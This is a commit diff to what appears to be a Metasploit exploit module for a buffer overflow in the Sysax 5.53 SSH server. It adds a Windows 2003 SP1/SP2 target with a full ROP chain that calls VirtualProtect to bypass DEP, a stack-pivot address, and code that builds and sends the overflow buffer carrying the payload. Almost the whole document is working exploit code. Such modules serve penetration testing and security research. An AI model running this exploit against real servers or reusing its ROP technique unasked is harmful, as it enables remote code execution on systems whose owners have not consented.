Add ROP target for Win2k3 SP1 and SP2

modules/exploits/windows/ssh/sysax_ssh_username.rb

@@ -47,9 +47,20 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					# Win XP SP3 and Win2k3 SP0
+					[
-					# POP/POP/RET - sysaxservd.exe
+						'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',
-					['Sysax 5.53 on Win XP SP3 / Win2k3 SP0', {'Ret'=>0x00402669}]
+						{
+							'Rop' => false,
+							'Ret' => 0x00402669  # POP/POP/RET - sysaxservd.exe
+						}
+					],
+					[
+						'Sysax 5.53 on Win2K3 SP1/SP2',
+						{
+							'Rop' => true,
+							'Ret' => 0x0046d23c  # ADD ESP, 0F8C # RETN
+						}
+					]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Feb 27 2012",
@@ -70,16 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
-	def exploit
+	def get_regular_exploit
-		#
-		# Load net/ssh so we can talk the SSH protocol
-		#
-		has_netssh = load_netssh
-		if not has_netssh
-			print_error("You don't have net/ssh installed.  Please run gem install net-ssh")
-			return
-		end
-
 		#
 		# Align the stack to the beginning of the fixed size payload
 		#
@@ -115,6 +117,80 @@ class Metasploit3 < Msf::Exploit::Remote
 		buf << "\xeb" + [0-align.length-2].pack('c') + make_nops(2) #Short jmp back
 		buf << [target.ret].pack('V*')
 
+		return buf
+	end
+
+	def get_rop_exploit
+
+		junk = rand_text(4).unpack("L")[0].to_i
+		nop  = make_nops(4).unpack("L")[0].to_i
+
+		# !mona rop -m msvcrt
+		p =
+			[
+				0x77bb2563, # POP EAX # RETN
+				0x77ba1114, # <- *&VirtualProtect()
+				0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+				junk,
+				0x77bb0c86, # XCHG EAX,ESI # RETN
+				0x77bc9801, # POP EBP # RETN
+				0x77be2265, # ptr to 'push esp #  ret'
+				0x77bb2563, # POP EAX # RETN
+				0x03C0990F,
+				0x77bdd441, # SUB EAX, 03c0940f
+				0x77bb48d3, # POP EBX, RET
+				0x77bf21e0, # .data
+				0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
+				0x77bbfc02, # POP ECX # RETN
+				0x77bef001, # W pointer (lpOldProtect) (-> ecx)
+				0x77bd8c04, # POP EDI # RETN
+				0x77bd8c05, # ROP NOP (-> edi)
+				0x77bb2563, # POP EAX # RETN
+				0x03c0984f,
+				0x77bdd441, # SUB EAX, 03c0940f
+				0x77bb8285, # XCHG EAX,EDX # RETN
+				0x77bb2563, # POP EAX # RETN
+				nop,
+				0x77be6591, # PUSHAD # ADD AL,0EF # RETN
+			].pack("V*")
+
+		p << payload.encoded
+
+		#
+		# Similar buffer structure to get_regular_exploit
+		#
+		buf  = ''
+		buf << rand_text(392, payload_badchars)
+		buf << rand_text(20, payload_badchars)
+		buf << rand_text(1012, payload_badchars)
+		buf << p
+		buf << rand_text(9204-buf.length)
+		buf << rand_text(4, payload_badchars)
+		buf << [target.ret].pack('V*')
+
+		return buf
+	end
+
+	def exploit
+		#
+		# Load net/ssh so we can talk the SSH protocol
+		#
+		has_netssh = load_netssh
+		if not has_netssh
+			print_error("You don't have net/ssh installed.  Please run gem install net-ssh")
+			return
+		end
+
+		#
+		# Create buffer based on target (DEP or no DEP)
+		# If possible, we still prefer to use the regular version because it's more stable
+		#
+		if target['Rop']
+			buf = get_rop_exploit
+		else
+			buf = get_regular_exploit
+		end
+
 		#
 		# Send the malicious buffer
 		#
@@ -149,6 +225,4 @@ end
 =begin
 Todo: We seriously need a MSF SSH mixin to handle the SSH protocol ourselves, not
 relying on net/ssh.
-
-* Need a reliable stack pivot to rop out, haven't found one
 =end